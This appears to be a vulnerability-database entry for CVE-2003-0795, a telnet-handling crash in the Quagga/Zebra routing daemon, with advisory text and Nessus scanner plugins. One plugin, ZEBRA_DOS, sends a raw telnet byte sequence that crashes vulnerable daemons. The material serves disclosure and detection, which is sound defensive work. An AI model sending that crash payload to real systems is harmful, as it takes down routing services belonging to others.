Vulnerabilities > CVE-2003-0795 - Improper Input Validation vulnerability in multiple products

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
gnu
quagga
sgi
CWE-20
nessus
exploit available

Summary

The vty layer in Quagga before 0.96.4, and Zebra 0.93b and earlier, does not verify that sub-negotiation is taking place when processing the SE marker, which allows remote attackers to cause a denial of service (crash) via a malformed telnet command to the telnet CLI port, which may trigger a null dereference.

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Server Side Include (SSI) Injection
    An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
  • Cross Zone Scripting
    An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.

Exploit-Db

descriptionGNU Zebra 0.9x / Quagga 0.96 Remote Denial of Service Vulnerability. CVE-2003-0795. Dos exploit for linux platform
idEDB-ID:23375
last seen2016-02-02
modified2003-11-12
published2003-11-12
reporterJonny Robertson
sourcehttps://www.exploit-db.com/download/23375/
titleGNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service Vulnerability

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-415.NASL
    descriptionTwo vulnerabilities were discovered in zebra, an IP routing daemon : - CAN-2003-0795 - a bug in the telnet CLI could allow a remote attacker to cause a zebra process to crash, resulting in a denial of service. - CAN-2003-0858 - netlink messages sent by other users (rather than the kernel) would be accepted, leading to a denial of service.
    last seen2020-06-01
    modified2020-06-02
    plugin id15252
    published2004-09-29
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/15252
    titleDebian DSA-415-1 : zebra - denial of service
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-415. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(15252);
      script_version("1.19");
      script_cvs_date("Date: 2019/08/02 13:32:17");
    
      script_cve_id("CVE-2003-0795", "CVE-2003-0858");
      script_bugtraq_id(9029);
      script_xref(name:"DSA", value:"415");
    
      script_name(english:"Debian DSA-415-1 : zebra - denial of service");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Two vulnerabilities were discovered in zebra, an IP routing daemon :
    
      - CAN-2003-0795 - a bug in the telnet CLI could allow a
        remote attacker to cause a zebra process to crash,
        resulting in a denial of service.
      - CAN-2003-0858 - netlink messages sent by other users
        (rather than the kernel) would be accepted, leading to a
        denial of service."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.debian.org/security/2004/dsa-415"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "For the current stable distribution (woody) this problem has been
    fixed in version 0.92a-5woody2.
    
    
    The zebra package has been obsoleted in the unstable distribution by
    GNU Quagga, where this problem was fixed in version 0.96.4x-4.
    
    We recommend that you update your zebra package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:zebra");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2004/01/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"3.0", prefix:"zebra", reference:"0.92a-5woody2")) flag++;
    if (deb_check(release:"3.0", prefix:"zebra-doc", reference:"0.92a-5woody2")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2003-305.NASL
    descriptionUpdated zebra packages that close a locally-exploitable and a remotely-exploitable denial of service vulnerability are now available. Zebra an open source implementation of TCP/IP routing software. Jonny Robertson reported that Zebra can be remotely crashed if a Zebra password has been enabled and a remote attacker can connect to the Zebra telnet management port. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0795 to this issue. Herbert Xu reported that Zebra can accept spoofed messages sent on the kernel netlink interface by other users on the local machine. This could lead to a local denial of service attack. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0858 to this issue. Users of Zebra should upgrade to these erratum packages, which contain a patch preventing Zebra from crashing when it receives a telnet option delimiter without any option data, and a patch that checks that netlink messages actually came from the kernel.
    last seen2020-06-01
    modified2020-06-02
    plugin id12427
    published2004-07-06
    reporterThis script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/12427
    titleRHEL 2.1 : zebra (RHSA-2003:305)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2003:305. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(12427);
      script_version ("1.24");
      script_cvs_date("Date: 2019/10/25 13:36:10");
    
      script_cve_id("CVE-2003-0795", "CVE-2003-0858");
      script_xref(name:"RHSA", value:"2003:305");
    
      script_name(english:"RHEL 2.1 : zebra (RHSA-2003:305)");
      script_summary(english:"Checks the rpm output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Updated zebra packages that close a locally-exploitable and a
    remotely-exploitable denial of service vulnerability are now
    available.
    
    Zebra an open source implementation of TCP/IP routing software.
    
    Jonny Robertson reported that Zebra can be remotely crashed if a Zebra
    password has been enabled and a remote attacker can connect to the
    Zebra telnet management port. The Common Vulnerabilities and Exposures
    project (cve.mitre.org) has assigned the name CVE-2003-0795 to this
    issue.
    
    Herbert Xu reported that Zebra can accept spoofed messages sent on the
    kernel netlink interface by other users on the local machine. This
    could lead to a local denial of service attack. The Common
    Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
    name CVE-2003-0858 to this issue.
    
    Users of Zebra should upgrade to these erratum packages, which contain
    a patch preventing Zebra from crashing when it receives a telnet
    option delimiter without any option data, and a patch that checks that
    netlink messages actually came from the kernel."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2003-0795"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2003-0858"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2003:305"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected zebra package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:zebra");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:2.1");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2003/12/15");
      script_set_attribute(attribute:"patch_publication_date", value:"2003/11/12");
      script_set_attribute(attribute:"plugin_publication_date", value:"2004/07/06");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^2\.1([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 2.1", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    if (cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i386", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2003:305";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_WARNING,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {
      flag = 0;
      if (rpm_check(release:"RHEL2.1", cpu:"i386", reference:"zebra-0.91a-10.21AS")) flag++;
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_WARNING,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "zebra");
      }
    }
    
  • NASL familyDenial of Service
    NASL idZEBRA_DOS.NASL
    descriptionA remote denial of service vulnerability exists in Zebra and Quagga that can be triggered by sending a telnet option delimiter with no actual option data, which causes the daemon to attempt to dereference a typically NULL pointer and crash. This affects all versions from 0.90a to 0.93b.
    last seen2020-06-01
    modified2020-06-02
    plugin id11925
    published2003-11-17
    reporterThis script is copyright (C) 2003-2018 Matt North
    sourcehttps://www.tenable.com/plugins/nessus/11925
    titleQuagga / Zebra Malformed Telnet Command Denial of Service
    code
    # MA 2003-11-17: added Services/zebra + MIXED_ATTACK support
    
    # Changes by Tenable:
    # - Updated to use compat.inc (11/16/09)
    # - Revised plugin title, removed CVE-2003-0858 (6/27/09)
    
    
    include("compat.inc");
    
    if(description)
    {
            script_id(11925);
            script_version("1.25");
    
    	script_cve_id("CVE-2003-0795");
            script_bugtraq_id(9029);
      	script_xref(name:"RHSA", value:"2003:307-01");
    
            script_name(english:"Quagga / Zebra Malformed Telnet Command Denial of Service");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote routing daemon is prone to a denial of service attack." );
     script_set_attribute(attribute:"description", value:
    "A remote denial of service vulnerability exists in Zebra and Quagga
    that can be triggered by sending a telnet option delimiter with no
    actual option data, which causes the daemon to attempt to dereference
    a typically NULL pointer and crash. 
    
    This affects all versions from 0.90a to 0.93b." );
     script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Nov/151" );
     script_set_attribute(attribute:"see_also", value:"http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=107140" );
     script_set_attribute(attribute:"solution", value:
    "If using Quagga, upgrade to version 0.96.4 or later." );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "2003/11/17");
     script_set_attribute(attribute:"vuln_publication_date", value: "2003/11/13");
     script_cvs_date("Date: 2018/11/15 20:50:22");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_end_attributes();
    
            script_summary(english:"Attempts to crash the remote service Zebra and/or Quagga");
            script_category(ACT_MIXED_ATTACK);
            script_copyright(english:"This script is copyright (C) 2003-2018 Matt North");
    	script_require_ports("Services/zebra", 2601, 2602, 2603, 2604, 2605);
    	script_dependencie("find_service1.nasl");
            script_family(english:"Denial of Service");
            exit(0);
    }
    
    include("global_settings.inc");
    
    # Maybe we should try this on any telnet server?
    port = get_kb_item("Services/zebra");
    
    if (! port) port = 2601;
    if (! get_port_state(port)) exit(0);
    
    if (safe_checks())
    {
      banner = get_kb_item("zebra/banner/"+port);
      if (!banner)
      {
        soc = open_sock_tcp(port);
        if(!soc) exit(0);
        banner = recv_line(socket: soc, length: 1024);
        if ( banner ) set_kb_item(name: "zebra/banner/"+port, value: banner);
        close(soc);
      }
      if (banner && egrep(string: banner, 
    		pattern: "Hello, this is zebra \(version 0\.9[0-3][ab]?\)"))
        security_warning(port);
      exit(0);
    }
    
    if (report_paranoia < 2) exit(0);
    
    soc = open_sock_tcp(port);
    if(!soc) exit(0);
    
    s = raw_string(0xff,0xf0,0xff,0xf0,0xff,0xf0);
    
    send(socket:soc, data:s);
    r = recv(socket: soc, length:1024);
    close(soc);
    alive = open_sock_tcp(port);
    if(!alive) security_warning(port);
    else close(alive);
    
    
  • NASL familyMisc.
    NASL idQUAGGA_0_96_4.NASL
    descriptionAccording to its self-reported version number, the installation of Quagga
    last seen2020-06-01
    modified2020-06-02
    plugin id59786
    published2012-06-29
    reporterThis script is Copyright (C) 2012-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/59786
    titleQuagga < 0.96.4 Zebra Denial of Service Vulnerability
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(59786);
      script_version("1.6");
      script_cvs_date("Date: 2018/11/15 20:50:23");
    
      script_cve_id("CVE-2003-0795");
      script_bugtraq_id(9029);
    
      script_name(english:"Quagga < 0.96.4 Zebra Denial of Service Vulnerability");
      script_summary(english:"Check the version of Quagga");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote service may be affected by a denial of service
    vulnerability.");
      script_set_attribute(attribute:"description", value:
    "According to its self-reported version number, the installation of
    Quagga's Zebra daemon listening on the remote host is affected by a
    denial of service vulnerability.");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to version 0.96.4 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Nov/169");
      script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=106883387304266&w=2");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2003/11/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2003/11/12");
      script_set_attribute(attribute:"plugin_publication_date", value:"2012/06/29");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:quagga:quagga");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.");
    
      script_dependencies("quagga_zebra_detect.nasl");
      script_require_keys("Quagga/Installed", "Settings/ParanoidReport");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    
    app = "Quagga Zebra";
    kb = "Quagga/";
    
    if (report_paranoia < 2)
      audit(AUDIT_PARANOID);
    
    port = get_kb_item_or_exit(kb + "Installed");
    
    kb += port + "/";
    banner = get_kb_item_or_exit(kb + "Banner");
    ver = get_kb_item_or_exit(kb + "Version");
    
    if (ver !~ "^\d+(\.\d+)*$")
      audit(AUDIT_NONNUMERIC_VER, app, port, ver);
    
    fix = "0.96.4";
    if (ver_compare(ver:ver, fix:fix, strict:TRUE) >= 0)
      audit(AUDIT_LISTEN_NOT_VULN, app, port, ver);
    
    report = NULL;
    if (report_verbosity > 0)
    {
      report =
        '\n  Version source    : ' + banner +
        '\n  Installed version : ' + ver +
        '\n  Fixed version     : ' + fix +
        '\n';
    }
    
    security_warning(port:port, extra:report);
    

Redhat

advisories
  • rhsa
    idRHSA-2003:305
  • rhsa
    idRHSA-2003:307